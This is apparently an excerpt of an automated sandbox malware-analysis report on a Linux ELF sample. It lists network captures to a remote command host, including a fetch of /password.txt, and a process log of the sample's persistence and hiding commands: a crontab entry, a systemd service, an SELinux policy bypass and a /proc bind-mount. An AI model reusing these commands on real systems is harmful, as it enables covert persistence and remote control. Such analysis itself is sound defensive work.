                                                                                                                      Oct 27, 2024 20:38:41.012341022 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:38:42.154067993 CET53982808192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:38:42.159779072 CET80853982154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:38:42.570792913 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:38:42.570877075 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:38:47.574630022 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:38:47.574729919 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:38:51.006683111 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:38:51.012790918 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:38:52.579101086 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:38:52.579185963 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:38:54.440355062 CET43928443192.168.2.2391.189.91.42
                                                                                                                      Oct 27, 2024 20:38:57.582412958 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:38:57.582526922 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:01.007447958 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:01.014324903 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:02.586529016 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:02.586632967 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:07.596597910 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:07.596681118 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:11.008213997 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:11.013771057 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:12.593947887 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:12.594150066 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:12.870008945 CET53982808192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:12.892775059 CET80853982154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:17.599423885 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:17.599525928 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:21.144320965 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:21.150413036 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:22.607173920 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:22.607274055 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:27.606219053 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:27.606482983 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:31.275310040 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:31.280877113 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:32.610930920 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:32.611076117 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:37.639492989 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:37.639708996 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:41.318639994 CET53982808192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:41.325094938 CET80853982154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:41.325166941 CET53982808192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:41.328459024 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:41.334116936 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:42.617878914 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:42.618103027 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:47.619456053 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:47.619704962 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:51.356426954 CET521067878192.168.2.23154.12.82.11
                                                                                                                      Oct 27, 2024 20:39:51.362586975 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:52.626303911 CET787852106154.12.82.11192.168.2.23
                                                                                                                      Oct 27, 2024 20:39:52.626426935 CET521067878192.168.2.23154.12.82.11
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Oct 27, 2024 20:37:50.932391882 CET5619553192.168.2.231.1.1.1
                                                                                                                      Oct 27, 2024 20:37:50.942320108 CET5240453192.168.2.231.1.1.1
                                                                                                                      Oct 27, 2024 20:37:50.943300009 CET53561951.1.1.1192.168.2.23
                                                                                                                      Oct 27, 2024 20:37:50.949733019 CET53524041.1.1.1192.168.2.23
                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                      Oct 27, 2024 20:38:11.243227959 CET192.168.2.1192.168.2.238294(Port unreachable)Destination Unreachable
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Oct 27, 2024 20:37:50.932391882 CET192.168.2.231.1.1.10x83ecStandard query (0)www.google.com28IN (0x0001)false
                                                                                                                      Oct 27, 2024 20:37:50.942320108 CET192.168.2.231.1.1.10x2452Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Oct 27, 2024 20:37:50.943300009 CET1.1.1.1192.168.2.230x83ecNo error (0)www.google.com28IN (0x0001)false
                                                                                                                      Oct 27, 2024 20:37:50.949733019 CET1.1.1.1192.168.2.230x2452No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                      • 154.12.82.11:808
                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      0192.168.2.2353978154.12.82.11808
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Oct 27, 2024 20:37:52.109042883 CET115INHTTP/1.1 400 Bad Request
                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                      Data Ascii: 400 Bad Request


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      1192.168.2.2353982154.12.82.11808
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Oct 27, 2024 20:38:10.264491081 CET121OUTGET /password.txt HTTP/1.1
                                                                                                                      Host: 154.12.82.11:808
                                                                                                                      User-Agent: Go-http-client/1.1
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      Oct 27, 2024 20:38:11.214540958 CET213INHTTP/1.1 200 OK
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 16
                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                      Last-Modified: Sat, 21 May 2022 04:57:31 GMT
                                                                                                                      Date: Sun, 27 Oct 2024 19:38:11 GMT
                                                                                                                      Data Raw: cb 5e cf 60 9d e0 4a 51 15 21 27 9b bc c8 4c c8
                                                                                                                      Data Ascii: ^`JQ!'L


                                                                                                                      System Behavior

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:/tmp/linux_386.elf
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:/bin/bash -c /etc/32678&
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/32678
                                                                                                                      Arguments:/etc/32678
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/32678
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sleep
                                                                                                                      Arguments:sleep 60
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:service crond start
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sed
                                                                                                                      Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                      File size:121288 bytes
                                                                                                                      MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                                      Start time (UTC):19:38:08
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl start crond.service
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:/tmp/linux_386.elf
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9

                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:37:49
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/update-rc.d
                                                                                                                      Arguments:update-rc.d linux_kill defaults
                                                                                                                      File size:3478464 bytes
                                                                                                                      MD5 hash:16a21f464119ea7fad1d3660de963637
                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/update-rc.d
                                                                                                                      Arguments:-
                                                                                                                      File size:3478464 bytes
                                                                                                                      MD5 hash:16a21f464119ea7fad1d3660de963637
                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl daemon-reload
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:37:51
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:37:51
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:37:52
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:37:52
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl daemon-reload
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:37:53
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:37:53
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl enable linux.service
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:37:56
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:37:56
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl start linux.service
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/journalctl
                                                                                                                      Arguments:journalctl -xe --no-pager
                                                                                                                      File size:80120 bytes
                                                                                                                      MD5 hash:bf3a987344f3bacafc44efd882abda8b
                                                                                                                      Start time (UTC):19:38:20
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:20
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:/bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:38:21
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:38:21
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:38:22
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/bash
                                                                                                                      Arguments:-
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:38:22
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:22
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/bash
                                                                                                                      Arguments:bash -c "echo \"*/1 * * * * root /.img \" >> /etc/crontab"
                                                                                                                      File size:1183448 bytes
                                                                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/renice
                                                                                                                      Arguments:renice -20 6245
                                                                                                                      File size:14568 bytes
                                                                                                                      MD5 hash:3686c936ed1df483498266a36871cb5b
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/mount
                                                                                                                      Arguments:mount -o bind /tmp/ /proc/6245
                                                                                                                      File size:55528 bytes
                                                                                                                      MD5 hash:92b20aa8b155ecd3ba9414aa477ef565
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:service cron start
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:25
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:25
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                      Start time (UTC):19:38:25
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:25
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                      Start time (UTC):19:38:25
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:25
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:38:26
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:26
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:26
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:38:26
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:26
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sed
                                                                                                                      Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                      File size:121288 bytes
                                                                                                                      MD5 hash:885062561f66aa1d4af4c54b9e7cc81a
                                                                                                                      Start time (UTC):19:38:33
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl start cron.service
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:38:34
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/tmp/linux_386.elf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:34
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl start crond.service
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/systemd
                                                                                                                      Arguments:-
                                                                                                                      File size:1620224 bytes
                                                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                      Start time (UTC):19:37:50
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                      File size:22760 bytes
                                                                                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e
                                                                                                                      Start time (UTC):19:37:53
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/systemd
                                                                                                                      Arguments:-
                                                                                                                      File size:1620224 bytes
                                                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                      Start time (UTC):19:37:53
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                      File size:22760 bytes
                                                                                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e
                                                                                                                      Start time (UTC):19:37:56
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/systemd
                                                                                                                      Arguments:-
                                                                                                                      File size:1620224 bytes
                                                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                      Start time (UTC):19:37:56
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                      File size:22760 bytes
                                                                                                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e
                                                                                                                      Start time (UTC):19:37:57
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/systemd
                                                                                                                      Arguments:-
                                                                                                                      File size:1620224 bytes
                                                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                      Start time (UTC):19:37:57
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/boot/System.img.config
                                                                                                                      Arguments:/boot/System.img.config
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:37:57
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/boot/System.img.config
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:37:57
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/pkill
                                                                                                                      Arguments:pkill -9 32678
                                                                                                                      File size:30968 bytes
                                                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/boot/System.img.config
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:13
